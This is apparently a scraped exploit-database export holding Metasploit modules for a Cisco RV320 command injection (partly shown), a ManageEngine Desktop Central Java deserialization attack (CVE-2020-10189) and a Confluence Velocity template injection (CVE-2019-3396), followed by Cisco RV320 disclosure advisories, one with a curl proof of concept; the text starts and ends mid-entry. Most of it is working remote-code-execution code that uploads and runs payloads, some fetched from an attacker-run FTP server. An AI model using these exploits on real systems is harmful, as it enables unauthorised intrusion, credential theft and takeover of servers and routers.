Trying anyway...\")\n end\n\n res3 = send_request_cgi({\n 'uri' => normalize_uri(\"certificate_handle2.htm\"),\n 'SSL' => datastore['USE_SSL'],\n 'method' => 'POST',\n 'cookie' => cookies,\n 'vars_get' => {\n 'type' => '4',\n },\n 'vars_post' => {\n 'page' => 'self_generator.htm',\n 'totalRules' => '1',\n 'OpenVPNRules' => '30',\n 'submitStatus' => '1',\n 'log_ch' => '1',\n 'type' => '4',\n 'Country' => 'A',\n 'state' => 'A',\n 'locality' => 'A',\n 'organization' => 'A',\n 'organization_unit' => 'A',\n 'email' => '[email\u00a0protected]',\n 'KeySize' => '512',\n 'KeyLength' => '1024',\n 'valid_days' => '30',\n 'SelectSubject_c' => '1',\n 'SelectSubject_s' => '1'\n },\n 'data' => \"common_name=#{command_string}\"\n })\n unless res3\n vprint_error('Connection failed while sending command. Aborting.')\n return nil\n end\n\n unless res3.code == 200\n vprint_error('Sending command not successful.')\n return nil\n end\n print_status(\"Sending payload timed out. Waiting for stager to connect...\")\n end\n\n def check\n #Check if device is vulnerable by downloading the config\n res = send_request_cgi({'uri'=>normalize_uri(\"cgi-bin\",\"config.exp\")})\n\n unless res\n vprint_error('Connection failed.')\n return CheckCode::Unknown\n end\n\n unless res.code == 200\n return CheckCode::Safe\n end\n\n unless res.body =~ /PASSWD/\n return CheckCode::Detected\n end\n\n CheckCode::Vulnerable\n end\n\n def exploit\n # Main function.\n # Setting delay for the Stager.\n Timeout.timeout(datastore['HTTPDELAY']) {super}\n rescue Timeout::Error\n print_status(\"Waiting for stager connection timed out. 
Try increasing the delay.\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/32455", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-22T13:22:19", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include 
Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of that,\n the complete fix for the remote code execution vulnerability is now\n available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n ],\n ['Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ],\n ['PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 8383,\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'CmdStagerFlavor' => 'certutil', # This works without issue\n 'Notes' => {\n 'PatchedVersion' => Gem::Version.new('100474'),\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => 
[IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target is not responding to check')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central')\n end\n\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless version\n return CheckCode::Detected('Could not detect Desktop Central version')\n end\n\n vprint_status(\"Detected Desktop Central version #{version}\")\n\n if Gem::Version.new(version) < notes['PatchedVersion']\n return CheckCode::Appears(\"#{version} is an exploitable version\")\n end\n\n CheckCode::Safe(\"#{version} is not an exploitable version\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def 
upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\n 'vars_get' => {'img' => '\\\\logger.zip'}\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T09:24:35", "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not required to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). 
Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-18T00:00:00", "type": "zdt", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3396"], "modified": "2019-04-18T00:00:00", "id": "1337DAY-ID-32569", "href": "https://0day.today/exploit/description/32569", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::FtpServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\n 'Description' => %q{\n Widget Connector Macro is part of Atlassian 
Confluence Server and Data Center that\n allows embed online videos, slideshows, photostreams and more directly into page.\n A _template parameter can be used to inject remote Java code into a Velocity template,\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\n By default, Java payload will be used because it is cross-platform, but you can also\n specify which native payload you want (Linux or Windows).\n\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n This vulnerability was originally discovered by Daniil Dmitriev\n https://twitter.com/ddv_ua.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniil Dmitriev', # Discovering vulnerability\n 'Dmitry (rrock) Shchannikov' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-3396' ],\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\n [ 'URL', 'https://paper.seebug.org/886/']\n ],\n 'Targets' =>\n [\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8090,\n 'SRVPORT' => 8021,\n },\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 25 2019',\n 'DefaultTarget' => 0,\n 'Stance' => Msf::Exploit::Stance::Aggressive\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\n OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',\n 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])\n ])\n end\n\n # Handles ftp RETP command.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] RETR 
argument.\n # @return [void]\n def on_client_command_retr(c, arg)\n vprint_status(\"FTP download request for #{arg}\")\n conn = establish_data_connection(c)\n if(not conn)\n c.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\n case arg\n when /check\\.vm$/\n conn.put(wrap(get_check_vm))\n when /javaprop\\.vm$/\n conn.put(wrap(get_javaprop_vm))\n when /upload\\.vm$/\n conn.put(wrap(get_upload_vm))\n when /exec\\.vm$/\n conn.put(wrap(get_exec_vm))\n else\n conn.put(wrap(get_dummy_vm))\n end\n c.put(\"226 Transfer complete.\\r\\n\")\n conn.close\n end\n\n # Handles ftp PASS command to suppress output.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] PASS argument.\n # @return [void]\n def on_client_command_pass(c, arg)\n @state[c][:pass] = arg\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\n c.put \"230 Login OK\\r\\n\"\n end\n\n # Handles ftp EPSV command to suppress output.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] EPSV argument.\n # @return [void]\n def on_client_command_epsv(c, arg)\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\n end\n\n # Returns a upload template.\n #\n # @return [String]\n def get_upload_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\n EOF\n )\n end\n\n # Returns a command execution template.\n #\n # @return [String]\n def get_exec_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\n EOF\n )\n end\n\n # Returns checking template.\n #\n # @return [String]\n def 
get_check_vm\n (\n <<~EOF\n #{@check_text}\n EOF\n )\n end\n\n # Returns Java's getting property template.\n #\n # @return [String]\n def get_javaprop_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\n EOF\n )\n end\n\n # Returns dummy template.\n #\n # @return [String]\n def get_dummy_vm\n (\n <<~EOF\n EOF\n )\n end\n\n # Checks the vulnerability.\n #\n # @return [Array] Check code\n def check\n checkcode = Exploit::CheckCode::Safe\n begin\n # Start the FTP service\n print_status(\"Starting the FTP server.\")\n start_service\n\n @check_text = Rex::Text.rand_text_alpha(5..10)\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\n if res && res.body && res.body.include?(@check_text)\n checkcode = Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n checkcode = Exploit::CheckCode::Unknown\n end\n checkcode\n end\n\n # Injects Java code to the template.\n #\n # @param service_url [String] Address of template to injection.\n # @return [void]\n def inject_template(service_url, timeout=20)\n\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'headers' => {\n 'Accept' => '*/*',\n 'Origin' => full_uri(vhost_uri: true)\n },\n 'ctype' => 'application/json; charset=UTF-8',\n 'data' => {\n 'contentId' => '1',\n 'macro' => {\n 'name' => 'widget',\n 'body' => '',\n 'params' => {\n 'url' => datastore['TRIGGERURL'],\n '_template' => service_url\n }\n\n }\n }.to_json\n }, timeout=timeout)\n\n unless res\n unless service_url.include?(\"exec.vm\")\n print_warning('Connection timed out in #inject_template')\n end\n return\n end\n\n if res.body.include? 
'widget-error'\n print_error('Failed to inject and execute code:')\n else\n vprint_status(\"Server response:\")\n end\n\n vprint_line(res.body)\n\n res\n end\n\n # Returns a system property for Java.\n #\n # @param prop [String] Name of the property to retrieve.\n # @return [String]\n def get_java_property(prop)\n @prop = prop\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\n if res && res.body\n return clear_response(res.body)\n end\n ''\n end\n\n # Returns the target platform.\n #\n # @return [String]\n def get_target_platform\n return get_java_property('os.name')\n end\n\n # Checks if the target os/platform is compatible with the module target or not.\n #\n # @return [TrueClass] Compatible\n # @return [FalseClass] Not compatible\n def target_platform_compat?(target_platform)\n target.platform.names.each do |n|\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\n return true\n end\n end\n\n false\n end\n\n # Returns a temp path from the remote target.\n #\n # @return [String]\n def get_tmp_path\n return get_java_property('java.io.tmpdir')\n end\n\n # Returns the Java home path used by Confluence.\n #\n # @return [String]\n def get_java_home_path\n return get_java_property('java.home')\n end\n\n # Returns Java code that can be used to inject to the template in order to copy a file.\n #\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\n # It is meant to be used with #get_write_file_code.\n #\n # @param fname [String] The file to copy\n # @param new_fname [String] The new file\n # @return [void]\n def get_dup_file_code(fname, new_fname)\n if fname =~ /^\\/[[:print:]]+/\n @command = \"cp #{fname} #{new_fname}\"\n else\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\n end\n\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n end\n\n # Returns the 
normalized file path for payload.\n #\n # @return [String]\n def normalize_payload_fname(tmp_path, fname)\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\n if /^\\/[[:print:]]+/ === tmp_path\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\n else\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\n end\n end\n\n # Exploits the target in Java platform.\n #\n # @return [void]\n def exploit_as_java\n\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\n @command = ''\n\n java_home = get_java_home_path\n\n if java_home.blank?\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\n else\n vprint_status(\"Found Java home path: #{java_home}\")\n end\n\n register_files_for_cleanup(@fname)\n\n if /^\\/[[:print:]]+/ === @fname\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\n else\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\n end\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to execute #{@fname}\")\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n\n # Exploits the target in Windows platform.\n #\n # @return [void]\n def exploit_as_windows\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = 
Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n\n # Exploits the target in Linux platform.\n #\n # @return [void]\n def exploit_as_linux\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n @command = \"chmod +x #{@fname}\"\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n 
inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n def exploit\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\n\n # Start the FTP service\n print_status(\"Starting the FTP server.\")\n start_service\n\n target_platform = get_target_platform\n if target_platform.nil?\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\n else\n print_status(\"Target being detected as: #{target_platform}\")\n end\n\n unless target_platform_compat?(target_platform)\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\n end\n\n case target.name.downcase\n when /java$/\n exploit_as_java\n when /windows$/\n exploit_as_windows\n when /linux$/\n exploit_as_linux\n end\n end\n\n # Wraps request.\n #\n # @return [String]\n def wrap(string)\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\n end\n\n # Returns unwrapped response.\n #\n # @return [String]\n def clear_response(string)\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\n return match.captures[0]\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/32569", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-06T05:12:46", "description": "RedTeam Pentesting discovered that the configuration of a Cisco RV320 router may be exported without authentication through the device's web interface. 
Affected versions include 1.4.2.15 and 1.4.2.17.", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "zdt", "title": "Cisco RV320 Unauthenticated Configuration Export Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-24T00:00:00", "id": "1337DAY-ID-32053", "href": "https://0day.today/exploit/description/32053", "sourceData": "Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15, 1.4.2.17\r\nFixed Versions: since 1.4.2.19\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002\r\nAdvisory Status: published\r\nCVE: CVE-2019-1653\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based\r\nconfiguration interface. In the device's firmware, this functionality is\r\nimplemented using a variety of CGI programs. Access to this web\r\ninterface requires prior authentication using a username and password.\r\nRedTeam Pentesting discovered the CGI program:\r\n\r\n/cgi-bin/config.exp\r\n\r\nThis program can be used to export the router's configuration. In\r\ncontrast to other functions, this CGI program does not require any form\r\nof authentication. It may be accessed through the router's web server,\r\nwhich is available from the LAN by default. 
As described in [2],\r\nfirmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web\r\nserver to the WAN on TCP port 8007.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nA device's configuration can be retrieved by issuing an HTTP GET request\r\nto the vulnerable CGI program (output shortened):\r\n\r\n------------------------------------------------------------------------\r\n$ curl -s http://192.168.1.1/cgi-bin/config.exp\r\n####sysconfig####\r\n[VERSION]\r\nVERSION=73\r\nMODEL=RV320\r\nSSL=0\r\nIPSEC=0\r\nPPTP=0\r\nPLATFORMCODE=RV0XX\r\n[...]\r\n[SYSTEM]\r\nHOSTNAME=router\r\nDOMAINNAME=example.com\r\nDOMAINCHANGE=1\r\nUSERNAME=cisco\r\nPASSWD=066bae9070a9a95b3e03019db131cd40\r\n[...]\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nPrevent untrusted clients from connecting to the device's web server.\r\n\r\n\r\nFix\r\n===\r\n\r\nInstall firmware version 1.4.2.19 (or later) on the router.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability is rated as a high risk as it exposes the device's\r\nconfiguration to untrusted, potentially malicious parties. By\r\ndownloading the configuration, attackers can obtain internal network\r\nconfiguration, VPN or IPsec secrets, as well as password hashes for the\r\nrouter's user accounts. Knowledge of a user's password hash is\r\nsufficient to log into the router's web interface. 
Any information\r\nobtained through exploitation of this vulnerability can be used to\r\nfacilitate further compromise of the device itself or attached networks.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2018-09-19 Vulnerability identified\r\n2018-09-27 Customer approved disclosure to vendor\r\n2018-09-28 Vendor notified\r\n2018-10-05 Receipt of advisory acknowledged by vendor\r\n2018-10-05 Notified vendor of disclosure date: 2019-01-09\r\n2018-11-18 List of affected versions provided by vendor\r\n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor\r\n2019-01-23 Advisory published\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html\r\n[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801\n\n# 0day.today [2019-02-06] #", "sourceHref": "https://0day.today/exploit/32053", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-06T05:12:18", "description": "RedTeam Pentesting discovered that the Cisco RV320 router exposes sensitive diagnostic data without authentication through the device's web interface. 
Versions affected include 1.4.2.15 and 1.4.2.17.", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "zdt", "title": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-24T00:00:00", "id": "1337DAY-ID-32052", "href": "https://0day.today/exploit/description/32052", "sourceData": "Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others\r\nAffected Versions: 1.4.2.15, 1.4.2.17\r\nFixed Versions: since 1.4.2.19\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-003\r\nAdvisory Status: published\r\nCVE: CVE-2019-1653\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n\"Keep your employees, your business, and yourself productive and\r\neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal\r\nchoice for any small office or small business looking for performance,\r\nsecurity, and reliability in its network.\"\r\n(from the Cisco RV320 product page [1])\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based\r\nconfiguration interface. In the device's firmware, this functionality is\r\nimplemented using a variety of CGI programs. Access to this web\r\ninterface requires prior authentication using a username and password.\r\nRedTeam Pentesting discovered the CGI 